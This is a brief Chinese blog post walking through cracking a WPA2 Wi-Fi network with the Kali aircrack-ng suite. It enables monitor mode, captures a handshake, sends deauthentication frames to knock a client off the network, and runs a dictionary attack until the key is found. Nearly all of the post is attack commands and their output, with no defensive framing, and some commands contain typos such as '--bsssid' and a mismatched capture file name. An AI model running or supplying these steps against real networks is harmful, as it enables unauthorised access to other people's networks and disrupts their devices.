网络安全

kali下破解无线网络

2017-01-16  本文已影响107人  keviaor

演示一下wpa2加密的wifi破解
一个可用的无线网卡 kali支持
一个靠谱的字典

airmon-ng start wlan0 //挂载到mon

airodump-ng wlan0mon

CH 2 ][ Elapsed: 0 s ][ 2017-01-16 00:19

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

74:C3:30:5F:C7:32 -52 2 0 0 1 54e WPA2 CCMP PSK Windows

BSSID STATION PWR Rate Lost Frames Probe

74:C3:30:5F:C7:32 A4:44:D1:BC:5F:2F -70 0 - 1 0 1

74:C3:30:5F:C7:32 A4:44:D1:6D:9F:E7 -70 0 - 1 0 2

74:C3:30:5F:C7:32 F4:8B:32:6A:FD:A6 -70 0 -24e 0 2

目标 74:C3:30:5F:C7:32

airodump-ng -w tset -c 1 --bsssid 74:C3:30:5F:C7:32 wlan0mon

[CH 1 ][ Elapsed: 25 mins ][ 2017-01-16 00:19 ][ WPA handshake: 74:C3:30:5F:C7:32

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

74:C3:30:5F:C7:32 -51 100 14837 15808 0 1 54e WPA2 CCMP PSK Windows

BSSID STATION PWR Rate Lost Frames Probe

74:C3:30:5F:C7:32 A4:44:D1:BC:5F:2F -24 0e- 1 0 17623

74:C3:30:5F:C7:32 60:EE:5C:03:68:DD -50 1e-24e 50 310

74:C3:30:5F:C7:32 F4:8B:32:6A:FD:A6 -72 1e-24e 0 8215

74:C3:30:5F:C7:32 A4:44:D1:6D:9F:E7 -70 1e- 1 0 9175

aireplay-ng -0 5 -a 74:C3:30:5F:C7:32 -c A4:44:D1:BC:5F:2F wlan0mon

23:59:34 Waiting for beacon frame (BSSID: 74:C3:30:5F:C7:32) on channel 1

23:59:35 Sending 64 directed DeAuth. STMAC: [A4:44:D1:BC:5F:2F] [ 2|63 ACKs]

23:59:35 Sending 64 directed DeAuth. STMAC: [A4:44:D1:BC:5F:2F] [18|63 ACKs]

23:59:36 Sending 64 directed DeAuth. STMAC: [A4:44:D1:BC:5F:2F] [ 0|63 ACKs]

23:59:36 Sending 64 directed DeAuth. STMAC: [A4:44:D1:BC:5F:2F] [ 0|63 ACKs]

23:59:37 Sending 64 directed DeAuth. STMAC: [A4:44:D1:BC:5F:2F] [ 5|68 ACKs]

aircrack-ng -w wordlist.txt test-01.cap

BSSID ESSID Encryption

1 74:C3:30:5F:C7:32 Windows WPA (1 handshake)

Choosing first network as target.

Opening test-01.cap

Reading packets, please wait...

                             Aircrack-ng 1.2 rc4


  [00:00:00] 32/22859 keys tested (508.74 k/s)


  Time left: 44 seconds                                      0.14%


                      KEY FOUND! [ 123456789 ]



  Master Key     : B0 DB FA 71 B8 B9 4B D6 7A 1D FD AF 31 67 E0 C3

                   C4 D7 B3 7F 50 70 CC 01 1E 87 B2 DB D8 C1 1D 79 


  Transient Key  : BB BC FF 97 F6 89 6B EF B9 82 6E FF E0 73 4A 13

                   32 A4 A7 1F 14 FB 22 DB AA C4 C2 09 C5 E0 E3 33 

                   E7 47 BC B0 CF 22 54 D8 5B 52 A0 EC F8 90 6E 74 

                   2F 8E 29 32 4C BE C8 56 71 93 FF 62 41 0B 70 0A 


  EAPOL HMAC     : A6 FA 84 59 F3 92 51 52 CF 46 45 D8 2C 43 99 DE
上一篇下一篇

猜你喜欢

热点阅读